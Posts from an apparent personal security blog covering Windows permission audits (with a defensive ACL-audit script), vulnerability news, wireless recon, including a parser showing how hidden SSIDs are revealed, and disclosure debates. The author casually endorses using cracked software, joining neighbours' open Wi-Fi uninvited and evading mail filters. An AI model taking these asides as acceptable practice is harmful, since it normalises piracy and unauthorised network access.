The point of this little game will be not to stump each other by creating hardened systems or to try to find some 0day (we're not that sophisticated by any means!), but rather to just practice what we know, be aware of how security holes are created and where to look for them, and show each other different tools and ways to do things. Maybe after I have done this I'll post more details, but I certainly don't intend to do something profound or amazing with this.
.: tracking user access
Tracking user access in a corporate network is one of those, "Don't say that very loudly!" topics. No one likes to think about it because everyone knows they suck at it and trying to get it under control is a frustrating exercise. But what if you absolutely have to do this?

If you're like most small- and medium-sized companies, you use some sort of Windows-based file server and manual permissions management with Active Directory user accounts. Nothing could be messier when not managed properly. I've recently had the pleasure (?) of tackling such a project in my company. If you've ever utilized cacls-type tools to dump permissions lists in folder shares, you know they can fill up all the rows in a .csv file and more, even for a medium-sized file server.

Here is my approach in four major steps: 1) take inventory, 2) file permission organization, 3) account organization, and 4) data ownership. The goal of this project is to be able to answer the following questions: Who can access data X? What does person Y have access to? What is the process for requesting access to data Z?

1. Take inventory
The first order of business is to measure the pain. Grab a trusty Windows permission enumeration tool and dump the permissions on all your file server shares, including all subdirectories. I recommend limiting yourself to folders and not including files. Windows files are very annoying in their permissions and will inject a lot of weird data into your initial ACL dumps. The best tool I've come across for reporting on permissions is ScriptLogic's Enterprise Security Reporter. This is a commercial tool which does more reports than just permissions, but the ability to report permissions in configurable ways is invaluable. They have a 30-day trial on this product. You can create reports that pull out what a user has access to, as well as who all has access to a particular folder, including pulling users from groups in AD. Check out your file servers and all the folders you expect to have different permissions and see how accurate things are or are not. Take a deep breath, and move on.

2. file permission organization
Next, you have to determine how you will be doing permissions in the future. Here are my recommendations:

- Do not use DENY entries! They rarely show up in reporting tools and are just frustrating to troubleshoot.
- Do not use complicated subdirectory permission changes. You want to use permission inheritance as much as possible. The reason for this is accidental changes to permissions that are pushed down to all subfolders and files will overwrite all subdirectory differences. Oops! Eliminate the possibility of this very real mistake by being as flat as possible. Do only one or two levels of permissions differences; I prefer just one level. Our file server for departmental and team folders is I: on the desktops. From there, we do I:\Accounting, I:\Sales, and so on. Each of those folders has its own permission structure, and that's it. No odd I:\Accounting\SuperSecret\ folders with different permissions. If they need that, it can become I:\SuperSecret\ and be on the same level. Anyone who has worked with complicated permissions structures will no doubt be able to tell amazing horror stories.
- Use only those permissions that you need to use. For almost everyone, this can be narrowed down to Modify and Read-Only. Don't get fancy with Change or List or others.
- Use as few explicit permissions on folders as possible.
- Do not use EVERYONE or AUTHENTICATED USERS. Use Domain Users if you absolutely must have a share open to "everyone."
By following these guidelines, you accomplish a few things:
- Reduce the chance of permission inheritance mistakes.
- Improve the ability to pull accurate permissions reports.
- Decrease the amount of time and effort needed to make permissions changes and re-establish permissions (you can just push down permissions from I:\Accounting to all subdirectories and not worry about what you're wiping out).
3. account organization
While ScriptLogic has a nice tool to pull access reports, it is still yet another program for staffers to learn and, really, you can do much the same thing with some effective use of Active Directory accounts and groups.

For every folder on your file server that needs different permissions, create two groups to hold the users who will use those permissions: Read-Only and Modify. For I:\Accounting, I would make the groups Accounting Folder-Read-Only and Accounting Folder-Modify. Then anyone who needs Modify access to Accounting should be placed into the Accounting Folder-Modify group. Apply both of these groups to the explicit permissions on the folder with their respective permissions. This should mean you will have only a few explicit permissions on each folder: SYSTEM (likely), Administrators (likely), the Modify group, and the Read-Only group. Nice and clean!

One caveat to this approach is in the way Windows handles group tokens. When a user logs into their computer, the logon process will inform that computer which groups the user is a member of. If the user's group memberships change, their current session will not get the updated group membership information until the user logs out and logs back in (I typically just tell people to reboot, as they understand that better).

So all permissions changes will now require you to put that user or groups of users into the proper permission group, and then have them reboot. In a way, this is much easier than logging into the file server and updating permissions directly on the folders.

The biggest benefit, however, is in the ability to report on access. If you want to see what John Smith has access to, you just have to see which groups he is a member of. You'll see Accounting Folder-Modify, and it is quite obvious what he has access to. Likewise, if you check the members of the Accounting Folder-Modify group, you will see who all has access to that folder. Quick and simple!

One last note about AD organization: it really helps to have a very updated and group-based AD organization. Every employee in the company should be set to report to someone else in the Organization tab, and they should belong to some sort of role-based group. Accounting employees should be in the Accounting group, and so on. This way you can use groups instead of individual users when placing people into their Modify and Read-Only groups. This is tough, however, if HR is not very clear about the roles people play, or if the department and team names change frequently and without warning.

4. data ownership
Lastly, if a company is going to take permissions and access seriously, then ongoing support needs to be able to question requests made for those access levels. John Smith shouldn't just be able to request access to the Sales folder from the Help Desk himself. Someone has to authorize this access. Unfortunately, while most would think his manager is an appropriate authority, in reality, his manager typically has no idea what sort of information is in the store and will likely not do anything that prevents his employee from being productive.

A solution to this is similar to the Discretionary Access Control (DAC) method where data owners are assigned to data stores. The Accounting folder would be assigned an owner. This owner is then responsible for authorizing who has access to that folder. As part of that responsibility, that data owner should also know what sort of data they are a custodian of. If there are sensitive documents in the data store that some departments should not be privy to, the data owner should know this.

Accounting or Human Resource file shares are perfect examples of this sensitivity. The Help Desk should not be blindly granting this access just because a user requested it.

Some other tasks:
- regularly report permissions, both in AD groups and in explicit permissions. This will definitely show you how Windows "copy" screws with permissions. Likely, you'll want to regularly "re-push" inheritance down through each folder so that you can refresh the cleanliness of your permissions reports.
- reports should be given to data owners for their review
- make sure all permissions change requests are clear, explicit, and tracked, such as in a help desk ticket system. Don't assume Bob J. means Bob Jones. The requestor should be as explicit as possible so that Bob Johnson doesn't accidentally get access to HR.
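To make those checks repeatable, here is an added example (my own script for this post, not a ScriptLogic report or anything from Microsoft) in Python. It reads a permissions dump, flags every explicit entry that breaks the rules in step 2 (DENY entries, Everyone/Authenticated Users, ACLs below the top level, grants outside the Folder-Modify/Folder-Read-Only groups, odd rights), and answers the step 3 questions by expanding nested AD groups. The dump, the CORP domain, the users and the group memberships are all constructed, and the CSV columns are my assumption about what a permissions-report export looks like.

```python
"""Audit a permissions dump against the rules in step 2 and answer the
step 3 questions (who can access X, what can Y access) via nested groups.
Added example, not code from the post or any ScriptLogic/Microsoft tool;
the dump, domain, users, groups and CSV columns are all constructed."""
import csv
import io

SHARE_ROOT = "I:"
MAX_EXPLICIT_DEPTH = 1                  # only I:\<Dept> carries its own ACL
OPEN_PRINCIPALS = {"Everyone", "Authenticated Users"}

ACL_DUMP = """\
path,principal,type,rights,inherited
I:\\Accounting,NT AUTHORITY\\SYSTEM,Allow,FullControl,False
I:\\Accounting,BUILTIN\\Administrators,Allow,FullControl,False
I:\\Accounting,CORP\\Accounting Folder-Modify,Allow,Modify,False
I:\\Accounting,CORP\\Accounting Folder-Read-Only,Allow,Read,False
I:\\Accounting\\2006,CORP\\Accounting Folder-Modify,Allow,Modify,True
I:\\Accounting\\SuperSecret,CORP\\jsmith,Deny,FullControl,False
I:\\Sales,CORP\\Sales Folder-Modify,Allow,Modify,False
I:\\Sales,CORP\\Sales Folder-Read-Only,Allow,Read,False
I:\\Sales,Everyone,Allow,Read,False
I:\\Sales,CORP\\bjones,Allow,Write,False
"""
# Constructed AD membership: role groups nested inside the folder groups.
GROUP_MEMBERS = {
    "Accounting": ["jsmith", "ppatel"],
    "Sales": ["bjones", "mlee"],
    "Accounting Folder-Modify": ["Accounting"],
    "Accounting Folder-Read-Only": ["bjones"],
    "Sales Folder-Modify": ["Sales"],
    "Sales Folder-Read-Only": ["Accounting"],
}

def rel_parts(path):
    """Folder names below the share root: 'I:\\A\\B' -> ['A', 'B']."""
    return [p for p in path[len(SHARE_ROOT):].split("\\") if p]

def parse_dump(text):
    """Rows as dicts; 'CORP\\jsmith' and 'NT AUTHORITY\\SYSTEM' lose their prefix."""
    return [{"path": r["path"], "principal": r["principal"].split("\\")[-1],
             "deny": r["type"].lower() == "deny", "rights": r["rights"],
             "inherited": r["inherited"].lower() == "true"}
            for r in csv.DictReader(io.StringIO(text))]

def expected_rights(path, principal):
    """Rights a principal may hold explicitly on a top-level folder, else None."""
    top = rel_parts(path)[0]
    return {"SYSTEM": "FullControl", "Administrators": "FullControl",
            top + " Folder-Modify": "Modify",
            top + " Folder-Read-Only": "Read"}.get(principal)

def audit(aces):
    """One (path, principal, reason) per explicit entry that breaks the rules."""
    findings = []
    for a in aces:
        if a["inherited"]:
            continue                    # inheritance doing its job is the goal
        loc = (a["path"], a["principal"])
        if a["deny"]:
            findings.append(loc + ("DENY entry; reports tend to hide these",))
        elif a["principal"] in OPEN_PRINCIPALS:
            findings.append(loc + ("open to Everyone/Authenticated Users",))
        elif len(rel_parts(a["path"])) > MAX_EXPLICIT_DEPTH:
            findings.append(loc + ("explicit ACL below the top level",))
        elif expected_rights(a["path"], a["principal"]) is None:
            findings.append(loc + ("grant outside the Folder-Modify/Read-Only groups",))
        elif expected_rights(a["path"], a["principal"]) != a["rights"]:
            findings.append(loc + ("unexpected rights: " + a["rights"],))
    return findings

def expand(principal, members=GROUP_MEMBERS, seen=None):
    """Users behind a principal, following nested groups without looping."""
    seen = set() if seen is None else seen
    if principal in seen:
        return set()
    seen.add(principal)
    if principal not in members:
        return {principal}              # a user, or a built-in we don't expand
    users = set()
    for m in members[principal]:
        users |= expand(m, members, seen)
    return users

def who_can_access(folder, aces, members=GROUP_MEMBERS):
    """user -> rights on one folder (Deny entries are left to audit())."""
    out = {}
    for a in aces:
        if a["path"] == folder and not a["deny"]:
            for u in expand(a["principal"], members):
                out.setdefault(u, set()).add(a["rights"])
    return out

def what_can_access(user, aces, members=GROUP_MEMBERS):
    """folder -> rights one user holds anywhere in the dump."""
    out = {}
    for a in aces:
        if not a["deny"] and user in expand(a["principal"], members):
            out.setdefault(a["path"], set()).add(a["rights"])
    return out

ACES = parse_dump(ACL_DUMP)
if __name__ == "__main__":
    print(*audit(ACES), who_can_access("I:\\Accounting", ACES), sep="\n")
```

Run it against the real export on a schedule and hand the findings to the data owners. Deny entries are deliberately not modelled in the two access queries; the audit flags them and the fix is to remove them, not to reason about them.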
There are plenty of other caveats and approaches to doing user access security in a Windows environment, and quite a lot more work than is described here, but this should at least give some good ideas on an approach that I think works pretty darn well.
.: the year has begun with a sprint
I can't believe what I'm reading as I catch up on news from the long weekend. There's a lot of things suddenly being found that I need to look at and/or evaluate. I would have better links, but I can't browse some sites without being flagged while at work.

VLC Media Player has a bug, even in the Windows version. So much for trying to hide from Windows Media Player.

WinZip (not that I necessarily use it, I think I still just use an old cracked version 8 or 9 copy and have been looking at open source alternatives lately) has a bug in it that now has exploit code released.

XSS vulnerability leads to Gmail contact list disclosure. Guess it is time to add to the list of things people should do to stay safe: always log out of web sites when you are done using them for your session. This is becoming more and more necessary.

Daylight Saving Time is changing (whoa, boy, a silent and likely more potent "y2k" issue?).

Symantec still has lots of vulnerable installations out there, and they are growing, which is a bit disconcerting.

Update: I forgot about Adobe!
.: softkit.ro and evolvatelecom.net
Just posting this here for my own benefit. Off and on since about 12/12/06 I have been seeing SYN floods (nothing huge, just a trickle) coming into my web servers on port 80 tcp and apparently coming from systems at softkit.ro and evolvatelecom.net (both European). I've not thought much of them as they are not huge and I've had other things I've been busy on, but this afternoon I did a check. I found this on the mynightwatchman.com site:
We are aware of this problem, but it is not originating from our network. As of last month we are the target of a DRDOS attack coming from the internet. From what we’ve gathered the attacker is sending source-IP spoofed SYN packets to a very large number of web servers (including yours - directed at port 80 only), the result being those servers flooding us with SYN+ACK packets afterwards.
We’d love any help from you on this matter, given that you have extensive logs on your affected servers.
Something of interest would be that we are not receiving any RST packets so this lead us to believe the attacker is probing the ports on the machines he’s using subsequently and not sending the packets blindly at random IPs.
As you can imagine, this is very disturbing for us too, but we have found absolutely no way and no support in catching this attacker. We would appreciate any support...
That pretty much sucks.
.: there are dashboards...and then there are dashboards!
First of all, I have a new link in the dashboards section. I like dashboards. Management goes ga-ga over dashboards. That makes me like dashboards even more! I've never linked to it (amazingly) on the menu, but I just added one for the F-Secure Worldmap which is kinda cool.

Now, that dashboard is pretty pastel-laden. However, check out the wallpaper pics of what the F-Secure internal, realtime dashboard looks like. Pardon me, but that's fuckin' awesome!
.: catching phishers
"If you can make it clear what is to be rewarded and what punished, make your directives reliable, keep your machines in good repair, train and exercise your officers and troops, and let their strengths be known so as to overcome the opponent psychologically, this is considered very good." -The Art of War, Chapter 3: Planning the Attack

The Muse (yeah, I'm stealing a concept from my days of writing...maybe I should call this my Geek Muse?) visits at some odd times. I saw a post on Security Renaissance about a new method of staying ahead of phishers as posted on the F-Secure blog. For some reason before I even clicked on the link, I quickly thought about a device in front of the spam filters that scans every email for links and compiles them all into a greylist. That way when corporate users receive an email, any links in that email will already be either blocked or placed into a higher level of alert, perhaps on a web proxy.

For about 2 minutes I thought that was a cool idea, but then I did think about how many legitimate email links would get flagged. So maybe that is not so much a cool idea for a corporate network, but for a company whose lifeblood is email or email/spam/virus protection, a realtime catcher like that along with human bodies evaluating the trends and list of sites would be valuable. You can't always wait for the spikes in traffic or the reports from users AFTER they have received all the phishing emails and gone to those sites and turned their computer into a bomb. Either way, this is still reaction, just higher upstream than most people tend to react, and not technically prevention.

Chances are, the big boys in this field already do this, but thinking about such things makes my brain smile.
.: software obscurity
IE has been beaten up over the years, and now that Firefox has gained ground, it also is under fire. While Office has been beaten up last year, now perhaps Open Office will be subjected to the lean eyes of the hacking underground. This post by Brian Krebs is timely, but I particularly love the first couple comments; the first about Open Office, and the second about a just-today-released-patch for an issue in Open Office. As applications keep getting attacked, especially Office and web browsers, more and more people are scattering over to lesser-known and oft-times free software to accomplish their tasks, myself included. But just because it has not been hit yet, does not make it secure. It might be a little bit safer to use as the odds of an attack are lower, but obscurity alone does not necessarily provide security.
.: some wireless hotspot security tips
Andy ITGuy pointed out an article on Computer World, 10 things to do to be more secure when using public wireless hotspots. Nice article.

The good tips that will slowly disappear as Windows fixes its wireless management:
- disable ad hoc mode
- turn off network discovery
The just plain good tips:
- turn off file sharing
- disable your wireless adapter when not in use
- turn on your firewall
- watch out for shoulder-surfers
Then Preston has a few more interesting suggestions. He suggests encrypting your e-mail, but sadly gives no more information about how to accomplish this. Most consumers will stop there, give an annoyed huff, and skip that step. Encrypting one's email is not as easy for many users as it could be, and is completely email provider-specific. It might be as easy as changing a couple of connection settings in the client, or as complicated as figuring out PGP or some other service that claims secure email (by simply never transmitting it off their webmail servers and forcing your recipients to make accounts to retrieve the mail...bleh!). Some users will just be out of luck when it comes to secure mail transmission and won't have corporate recourse for checking mail beyond port 110 and cleartext messages. In those cases, just don't do it.

Carry an encrypted USB drive. I'm not sure if this is worthy of a bullet point, but if someone will be going through the trouble of using an encrypted USB drive for data, why not encrypt the whole laptop disk? Besides, if an attacker takes over the system, they should be savvy enough to impersonate an admin or the user and access most encryption. It makes some sense, but I think it is more effort than is necessary. I dislike having to track multiple "portable" devices, especially ones that can be lost as easily as a USB drive. To me, data encryption on the disk is a "data at rest" issue, not a wireless security issue.

Protect yourself with a virtual private network. I'm not sure I would suggest people use a third-party VPN service. Home consumers on their own equipment, sure, but not corporate users who think it would be safe to transmit possibly-sensitive information through a third-party who may or may not be credible. Too many people think that just because they pay money for it, it must be on the up-and-up. Instead, corporate users should look into what their corporate support is for VPN use. Home users can go the *very* technical route of hosting their own VPN/proxy system, or utilize the pay-for service if they want. I think if email is encrypted, web site logins are protected via SSL, and cleartext IM service not used, most users will be fine without a VPN.

Beware phony hotspots. First, I hate the term "evil twins." We've had a better term for this for years now: "rogue AP." While there is not much most users can do to protect against the rogue AP problems, I do like his two suggestions. Ask the staff if they have a hotspot and what the name is. And if you see two of the same name, don't connect to either one. Any further security against a rogue AP is either overkill for most users, or is really the responsibility of the hotspot establishment.
.: full disclosure - it makes us stronger
I've decided that as I move forward with my site here and my posts, I'm not necessarily going to be completely PC and try to be pleasing to people. I want to take a stance and not feel like I have to assuage anyone else, especially with my own feelings and site. :)

So, where do I stand with full disclosure? First, I think we need to buck up, let people do their thing, stop quibbling about how to properly disclose, and just move forward with our goal: security. We don't sit here whining about how we can't control the environment and then let security slide until we can control the environment. It is unknown, ephemeral, ever-changing. Whether someone practices full-disclosure or protected disclosure, I don't much care: I still have to practice security and I need to be able to roll with the punches and what the environment hands me.

There are two caveats to this debate, which few people seem to address when passionately debating this topic. First, there is the entire full disclosure concept and whether we should practice it. Second, there is the question on whether security professionals should practice full disclosure or more "responsible" disclosure.

Whether an attack vector, vulnerability, or known proof-of-concept exploit is available or not, I would rather know about these items as opposed to not know about them and hope that an attacker doesn't secretly use them against me. If someone has found a hole and will report it to the vendor reasonably, it should be a security researcher's position to assume two other people in the world know about the issue as well. And are actively exploiting it or soon going to. Or maybe have been previously. We cannot squelch communication amongst ourselves and expect to keep up with attackers. I am in favor of full disclosure.

On the second part about security professionals, I have less opinion and think it is a case-by-case issue.

In the end, like nature, what doesn't kill us only makes us stronger and more resilient.

Update: I just wanted to add to this that I really don't necessarily trust vendors. Vendors are economic entities, and most of the time the media and researchers end up interfacing with the ineffectual and smoke-screening PR and Marketing sides. I don't trust that, and if I were to weigh my trust of vendors against my desire to know about the problems, the vendors do not typically win. This would change if vendors not only fessed up to holes they patch, but would also be liable for any damages incurred through direct use of those holes. Of course, then I see vendors getting slimier and doing the whole lawyer dance jig... In the end, vendors need to also get off the soapbox about responsible disclosure and just be up front and honest with the community and the world. Painting a picture of rosy security happiness where even puppies and rainbows can use their software without a care in the world is a dying approach. Security is merging with business in the back office, but what about the front office?
.: the rate of success with penetration tests
One of my favorite questions to ask pen-testers or other security assessors is how often they are successful and what techniques are the most successful. I imagine social engineering and physical attacks have a very high rate of success; in fact, I wouldn't bat an eyelash if pen-testers claim those are 100% successful when attempted. I'm sure there are many other ways they can own a network, but when they run into a tough cookie to break, I wouldn't be surprised if those methods combined with some wire sniffing yields positive results almost all the time. This article I read this morning caught my imagination:
Core Security Technologies has never failed in its spear phishing tests against large organizations, Caceres said, an indication of the task DOD faces as it attempts to battle its latest network threat. The human factor, which requires e-mail users to carefully examine their messages, plays a critical role in defeating spear phishing, Caceres said.
I think this is why discussion on user education is still rather mixed. Most everywhere I read that user education is necessary as we build security awareness and programs in organizations, with this as proof that we need more education. Others will claim that user education is not going to solve this, and we should focus more on technology and other aspects. They will also cite these results by saying that getting intelligent users who consistently make the correct decisions is a losing battle.

At any rate, I love hearing about success rates and common means of access into networks. Jeremiah Grossman has been doing a related survey for web application specialists for a few months now, and has been quite readily and hungrily accepted.

I wonder if there are similar surveys or data for pen-testers?

Update: Of interest, Dana Epp pointed me over to a presentation on combating social engineering.
.: get me some of that white dust
Not a huge deal, but it looks like one of those nicer sites that I don't see many people talk about has had a facelift. Whitedust doesn't display correctly for me at work on IE7, but it does look like they have ramped up their news coverage and now report quite a wide array of things in the RSS feed. Their news reminds me a lot of Rootsecure: some news, some articles, some podcasts, and so on. Always been some good stuff there despite them being a relative newcomer to the scene and UK-based.

.: working on my wireless foo
Ordinary people see the means of victory but do not know the forms by which to ensure victory. -The Art of War Chapter 4: Formation

Am digging into my inner wireless geek this month as well. This means buying a little bit more hardware. Most of this stuff is best available on eBay and I plan to get my hands on some of these things soon.

Orinoco Classic Gold wireless PCMCIA card x2
Sharp Zaurus SL-6000
AmbiCom compact flash wireless card (or similar)

The Sharp Zaurus runs on Linux and has internal wireless. This means I can run Kismet on it. I already have an older Dell Axim X5 that I picked up at my old job and totally forgot I still had (and if I want another one for some reason, they seem dirt cheap on eBay). It has no internal wireless and runs Windows PocketPC, but I can put the compact flash wireless in this guy and get it to run. It also gives me the ability to run Ministumbler if I wanted to. I'd rather use Kismet and the Zaurus, but I got lucky in already possessing a little-used Axim.

Now, why would I want both Kismet and Ministumbler? First, some people simply respond better or worse to Linux or Windows. If I don't want to show someone how to do wireless tricks, I'll glaze their eyes over with Linux. If I'm looking to impress a gir...err...a manager with pretty colors and graphs so they spend money on or for me, I may get better results on Windows and Ministumbler. Second, Ministumbler is an active recon tool, so it will only see networks that have the SSID broadcast. Kismet is passive. While it will see non-broadcast SSID networks, I'm not yet sure how it sees them if there is no traffic on them.
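
What a passive sniffer actually gets to work with, as an added example (not code from the original post, and not Kismet's own code): an AP with a "hidden" network still has to send beacons, it just ships them with an empty (or all-NUL) SSID element, so a passive tool learns the BSSID right away and fills in the name the first time any client probes for it and the AP answers with a probe response. The frames below are built by hand rather than captured, only the 24-byte management header, the fixed beacon/probe-response fields and the SSID element are parsed, and the BSSIDs are made up.

```python
"""Passive 802.11 discovery over a list of raw management frames.
Added example, not from the original post. Frames are constructed inline;
no capture file or wireless card is needed."""
import struct

MGMT_BEACON = 0x80      # frame-control byte 0: type 0 (management), subtype 8
MGMT_PROBE_RESP = 0x50  # type 0, subtype 5
IE_SSID = 0             # information element tag for the SSID


def build_mgmt_frame(fc0, bssid, ssid):
    """Build a minimal beacon / probe response: 24-byte header (FC, duration,
    addr1=broadcast, addr2=addr3=BSSID, seq), 12 bytes of fixed fields
    (timestamp, beacon interval, capability), then a single SSID element."""
    header = struct.pack("<BBH", fc0, 0, 0) + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0411)
    ie = struct.pack("BB", IE_SSID, len(ssid)) + ssid
    return header + fixed + ie


def parse_mgmt_frame(frame):
    """Return (fc0, bssid, ssid) for a beacon or probe response, else None.
    ssid is b'' when the AP suppresses it (zero-length or all-NUL element)
    and None if no SSID element is present at all."""
    if len(frame) < 36:
        return None
    fc0 = frame[0]
    if fc0 not in (MGMT_BEACON, MGMT_PROBE_RESP):
        return None
    bssid = frame[16:22]   # addr3 carries the BSSID in these frames
    body = frame[36:]      # skip header (24) + fixed fields (12)
    ssid = None
    pos = 0
    while pos + 2 <= len(body):
        tag, length = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + length]
        if len(value) != length:
            break          # truncated element; stop rather than misparse
        if tag == IE_SSID:
            ssid = b"" if value.strip(b"\x00") == b"" else value
            break
        pos += 2 + length
    return fc0, bssid, ssid


def discover(frames):
    """One pass over a capture. Beacons enumerate every BSSID, hidden or not;
    a probe response reveals a hidden network's real SSID."""
    networks = {}
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None:
            continue
        fc0, bssid, ssid = parsed
        entry = networks.setdefault(bssid, {"ssid": None, "hidden": False, "beacons": 0})
        if fc0 == MGMT_BEACON:
            entry["beacons"] += 1
            if ssid == b"":
                entry["hidden"] = True
            elif ssid and entry["ssid"] is None:
                entry["ssid"] = ssid
        elif fc0 == MGMT_PROBE_RESP and ssid:
            entry["ssid"] = ssid   # probe responses always carry the real name
    return networks


# Constructed capture: one open AP, one AP hiding its SSID two different ways,
# a data frame that is ignored, and finally the probe response that gives
# the hidden network away.
AP_OPEN = bytes.fromhex("00112233aabb")
AP_HIDDEN = bytes.fromhex("00112233ccdd")
CAPTURE = [
    build_mgmt_frame(MGMT_BEACON, AP_OPEN, b"corpnet"),
    build_mgmt_frame(MGMT_BEACON, AP_HIDDEN, b""),
    build_mgmt_frame(MGMT_BEACON, AP_HIDDEN, b"\x00" * 9),
    b"\x08\x00" + b"\x00" * 40,
    build_mgmt_frame(MGMT_PROBE_RESP, AP_HIDDEN, b"hiddennet"),
]

if __name__ == "__main__":
    for bssid, info in discover(CAPTURE).items():
        print(bssid.hex(":"), info)
```

A BSSID whose beacons all carry an empty SSID is therefore visible the moment the card is put in monitor mode; only the name waits for a probe/response exchange or an association from a client that already knows it.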

Now I just need to pick out a GPS unit (I don't want to spend much, I'm not an extreme outdoorsman who needs something amazing) and possibly decide if I want to explore an external antenna or hold off on that. All told, I don't expect to spend more than $60 on the wireless cards and maybe $200 on the Zaurus.

Also just saw this 2-part article on SecurityFocus about wireless forensics.
.: perfection in security
It is interesting to hear us be adamant about perfection in security, whether it be perfect devices, perfect approaches, or perfect coding. Really, digital integrity pales compared to personal safety. Do we expect perfection in being safe when on the road? Do we demand that cars be built to absolutely withstand the stupidity of drivers? Do we move to diminish the role of the user when driving? Do we do much beyond laws, liability, some technological improvements, and a common understanding that green is go, red is stop, yellow is speed up and pretend not to notice anyone else, and lines are guidelines on traffic flow except in parking lots where they are so much street graffiti? Ever try to play traffic cop in your car, where the guy behind you wants to speed and basically blows out his O-ring having a conniption fit behind you while you drive the limit (yeah, me too, it's fun because I can be a dick now and then).

It is interesting that we accept a certain level of reasonableness when it comes to our safety in life, but become hardasses when talking about digital security.

Have we achieved perfection in physical security, whether it be at home or in the workplace? It might sound like I am being defeatist. On the contrary, I say this all very enthusiastically.

Update: I am going to amend, but not remove my original post above. Yes, there are differences in my choice of analogy and the security world. In too many cases, we don't end up living with our bad choices on the road, but in digital insecurity, we end up living with them. Ask any identity theft victim how hellish their life has been since. Likewise, I accidentally dismissed one thing I thump a lot when it comes to the digital life: efficiency. If a traffic accident were like a digital security incident, then one accident might end up affecting every single car built in 2003 in the state that is currently on the road, and when others currently at rest get started up in the morning, they immediately suffer the same result. One obscure issue in MySpace that only 50 people even understand could result in a worm that affects many thousands of people.
.: wireless laws coming in 2007?
It amazes me how slowly wireless has been tackled, especially as everyone has completely jumped on Office products and browsers with all sorts of problems. Perhaps this year will usher in some more changes?

By way of Whitedust, I was pointed over to a pair of NetworkWorld articles. The first deals with new laws and guidelines about business-run wireless networks, both public and those intended to be private. In addition, it tackles vendors who should not default insecure or at least give users some guidance on securing those devices. These are seemingly easy and no-brainer topics, but yet implementation is such that I am astounded about the lack of attention wireless technologies receive. Heck, even insecure cell phones get more press compared to the data networks! The second talks a little bit about 802.1X (in that sort-of-technical-but-not-really-technical way the NetworkWorld writes).

More laws make me happy when it comes to securing wireless and our digital world. But more laws also make me say, "D'oh!" a few more times, since I am one of those people who likes to drive around and see what open wireless networks there are, and hopping on one when I have a need (when traveling or at a friend's place, for instance, and just hopping on an open neighbor network).
.: security tools alerts
Just what I need, another feed/link/dashboard! But I will say I kinda like what Security Database has put up. I especially like the security tools alerts which are RSS-able.
.: wi-spy
Ever since Joat made mention of purchasing one, I've been eyeing the Wi-Spy and have it marked up on my "to buy" list for the future. Today, though, I see Joat received an email informing him that the price was going to go up in February. In fact, it is doubling. This little tool is far too cool to let pass away at a higher price. As far as I know, anything comparable is many hundreds of dollars more expensive, so I might move this up my list and get it in the next week or so. It can be bought off ThinkGeek as well as the manuf. site.
.: watching ssl traffic while sipping a beer
I've worked with SSL extensively, as has any sysadmin that knows what a web server and SSL certs are. But what about the real dirty guts of SSL? Sometimes, topics like this are difficult to grasp, but I found something that made enough sense to me that I re-wrote the process of an SSL session negotiation on a piece of scratch paper just to visualize it. Palisade has a question and answer about SSL which is written in very plain English for an intermediate to understand, and it actually makes complete sense to me! Other quiz questions are also available, although some are a little less interesting to me. Reading about HTTP cache smuggling is interesting (and makes sense, since you can hijack HTTP connections anyway, which can be fun on wireless with airpwn). .NET best practices are not quite as interesting to me right now.
.: generals in the field
I'm still settling into what I want this blog to be, so please bear with me. I'm also ramping up my studying for the CCNA which I need to make sure I take sooner than later and get it done with, plus all my other smaller projects at home. This weekend we are scheduled to get lots of freezing rain and about 3-7 inches of snow Sunday. Unlike other parts of the country, though, we're used to it and life moves on just fine and the Internets don't disappear with the power when some flakes drop!

Turns out Andy ITGuy also has the same Art of War desk calendar that I have and posted some feedback on this entry yesterday:
"Generals in the field must already be acquainted with all the sciences of warfare before they can command their own soldiers and assess battle formations." Chapter 3: Planning the Attack
It took me an extra day to revisit this topic, but I think this is a difficult place in security management and IT management. It is difficult to know so much about the sciences of our warfare. It seems difficult enough to even brush against all the various topics that need to be dealt with. I've worked for managers that couldn't do my job for the life of them, and they never commanded the trust or respect of the teams they managed. I've also worked for managers who could do my job, and they were much more effective in all aspects. But there is still so much to be informed about these days.
.: the people who have left google
From Whitedust, I was pointed to this interesting article about employees who have left Google. I am inspired by hearing that a number of these people were far older than I am now when they started at Google. Sometimes one gets bogged down with that thought that only happenin' things occur to the brightest students fresh out of college doing amazing things. That's the flashy story you always hear. That if you don't jump up high enough out the doors onto the rungs of the career ladder, you'll burn out before getting up higher where you want to be. Really, that's not true, and that's something to continue to look forward to through my entire career and life, to be honest.
.: snort cpu spike vuln
I'll put up a better link later when I find one, but a recent presentation and paper (I printed them out yesterday but have not read them yet) on a Snort algorithmic vulnerability has been talked about and patched. The vuln would cause Snort to spike the cpu to 100% and eventually crash. Why is this useful? This is a lot like someone cutting off the alarm systems before robbing a bank. You can even do this externally if a company has Snort running outside the firewall (not uncommon in order to determine differences across the perimeter defenses) and that same server is running the inside Snort instance. Since this is an easy but technical exploit, I suspect this to be packaged eventually into attack toolkits rather quietly. I would suspect old Snort instances may stay in production for years in some cases.
.: we don't need no stinkin' passwords
I didn't get but three paragraphs into Bruce Schneier's latest wired.com article about secure passwords, and I came across, "Your encryption program's key-escrow system is almost certainly more vulnerable than your password, as is any "secret question" you've set up in case you forget your password."

How often do botnet herders need to break into a system by gaining access to the password? And once they get in, how often do they actually ever care about the password? Not often, I suspect. Why care about the password if the user runs your program as their already-auth'ed credential? Why worry about laptop encryption when the user is already logged on? How often have I seen someone walk away from their laptop at Panera or Starbucks and not lock it? Point taken, though, that passwords, while targeted and popular, are maybe not the weakest link any more, just like network-borne attacks are quiet compared to fashionable web app attacks lately.

.: email as it pertains to data security
I liked this article on the NYTimes site about email uses and abuses. How do you stop people from forwarding work email to a place they shouldn't, such as web-based mail services?

Well, the answer is that you can't, and you really don't need to bother trying to do so. Where I work we block port 25 outbound except when from certain servers which have strict relaying settings. We also utilize SurfControl which cuts into web-based email services such as Gmail, Yahoo, Hotmail, Hushmail, etc. The problem is that I can still just find a service so obscure that the filters don't catch it...such as my own mail server. Or I can just tunnel over something else and get there. But you still really can't stop me from e-mailing a Gmail account any more than any other account unless a company has really no business communicating with the world outside its own walls.

So what do you do? In something like this, it helps to realize and accept that prevention is impossible. In that case, how do you mitigate, minimize, log, audit, and CYA without being a barrier to the company's purpose?

